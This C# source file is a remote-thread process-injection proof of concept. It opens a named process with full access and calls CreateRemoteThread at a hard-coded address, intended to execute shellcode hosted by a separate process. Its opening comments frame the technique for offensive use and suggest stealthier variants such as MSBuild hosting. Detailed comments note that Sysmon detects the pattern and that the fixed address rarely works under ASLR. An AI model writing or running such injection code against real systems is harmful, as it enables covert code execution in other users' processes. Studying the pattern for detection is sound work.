// There are a number of ways to do this. In this example, you can host shellcode in one process,
// then call in and execute it from another; this is the most basic.
// Better ideas are things like hosting in MSBuild, then executing in another, CreateRemoteThread, etc..
// Have fun, the basic idea here is modularity, and splitting
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

// Code Adaptation Here
// https://gist.github.com/andreafortuna/b8cdf82932d11baaa779a5fbeb77526a/raw/db9edeec255bd98421fa562786f6f08206710c45/

/// <summary>
/// Proof-of-concept that opens a handle to a process selected by name and starts a
/// remote thread in it whose start address is a hard-coded constant.
/// Only <see cref="OpenProcess"/> and <see cref="CreateRemoteThread"/> are actually
/// invoked; the other P/Invoke declarations below are unused in this file.
/// From a defender's perspective the executed sequence — OpenProcess with a full
/// access mask on a foreign process followed by CreateRemoteThread — is the classic
/// remote-thread injection pattern that Sysmon (Event ID 8, CreateRemoteThread) and
/// EDR user-mode hooks are built to surface; the behaviour is attributable to the
/// calling image because no evasion is attempted.
/// </summary>
public class InjectionPoC
{
    // Opens a handle to another process. The call site passes 0x1F0FFF, which is the
    // pre-Vista value of PROCESS_ALL_ACCESS; the handle is never closed in this file
    // (no CloseHandle import is declared).
    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    // Declared but never called in this file.
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);

    // Declared but never called in this file.
    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    // Declared but never called in this file: no memory is allocated in the target.
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    // Declared but never called in this file: nothing is written into the target.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);

    // Starts a thread in the target process at lpStartAddress. Returns a thread handle,
    // or IntPtr.Zero on failure. lpThreadId is typed as IntPtr here (not an out
    // parameter), so the caller can only pass NULL and never receives the thread id.
    // The returned thread handle is never closed by the caller.
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    /// <summary>
    /// Entry point. <paramref name="args"/>[0] is a process name (without extension,
    /// as <see cref="Process.GetProcessesByName"/> expects). Prints a usage message and
    /// returns when no argument is given; otherwise reports success or failure of the
    /// remote-thread creation on the console.
    /// </summary>
    /// <param name="args">Command-line arguments; only the first is used.</param>
    public static void Main(string[] args)
    {
        if (args.Length == 0)
        {
            System.Console.WriteLine("Please enter process name...");
            System.Console.WriteLine("Usage: CodeInjectionPoC [process name]");
            return;
        }

        Console.WriteLine("Start injection...");

        Process targetProcess;
        try
        {
            // GetProcessesByName returns an empty array when nothing matches, so [0]
            // throws IndexOutOfRangeException; the bare catch below absorbs that (and
            // any other exception) and turns it into the "not found" message. If
            // several processes share the name, the first one returned is used.
            targetProcess = Process.GetProcessesByName(args[0])[0];
        }
        catch
        {
            System.Console.WriteLine("Process " + args[0] + " not found!");
            return;
        }

        // Get process handler
        // 0x1F0FFF = PROCESS_ALL_ACCESS (pre-Vista definition). The result is not
        // checked: if OpenProcess fails (insufficient privilege, protected process,
        // integrity-level mismatch) it returns IntPtr.Zero and that NULL handle is
        // passed straight into CreateRemoteThread, which then fails and is reported
        // as "Injection failed!".
        IntPtr process_handle = OpenProcess(0x1F0FFF, false, targetProcess.Id);

        // Despite the name, nothing is allocated here: this is a fixed virtual address
        // used verbatim as the remote thread's start address. It is only meaningful if
        // the target process happens to map executable code at exactly this address
        // (presumably captured from a specific earlier run) — nothing in this file
        // establishes that, and ASLR makes it unlikely to hold across processes or
        // reboots.
        IntPtr memory_allocation_variable = new IntPtr(0x197C8B50000);

        // Create a remote thread in the target whose start address is the hard-coded
        // value above, with a NULL parameter, default stack size, and no creation
        // flags. (The original comment mentioned LoadLibraryA; no such call or
        // argument exists in this code.) A non-NULL return is a thread handle; it is
        // never closed.
        if (CreateRemoteThread(process_handle, IntPtr.Zero, 0, memory_allocation_variable, IntPtr.Zero, 0, IntPtr.Zero) != IntPtr.Zero)
        {
            Console.Write("Injection done!");
        }
        else
        {
            // GetLastError is not read, so the failure reason is not reported.
            Console.Write("Injection failed!");
        }
    }
}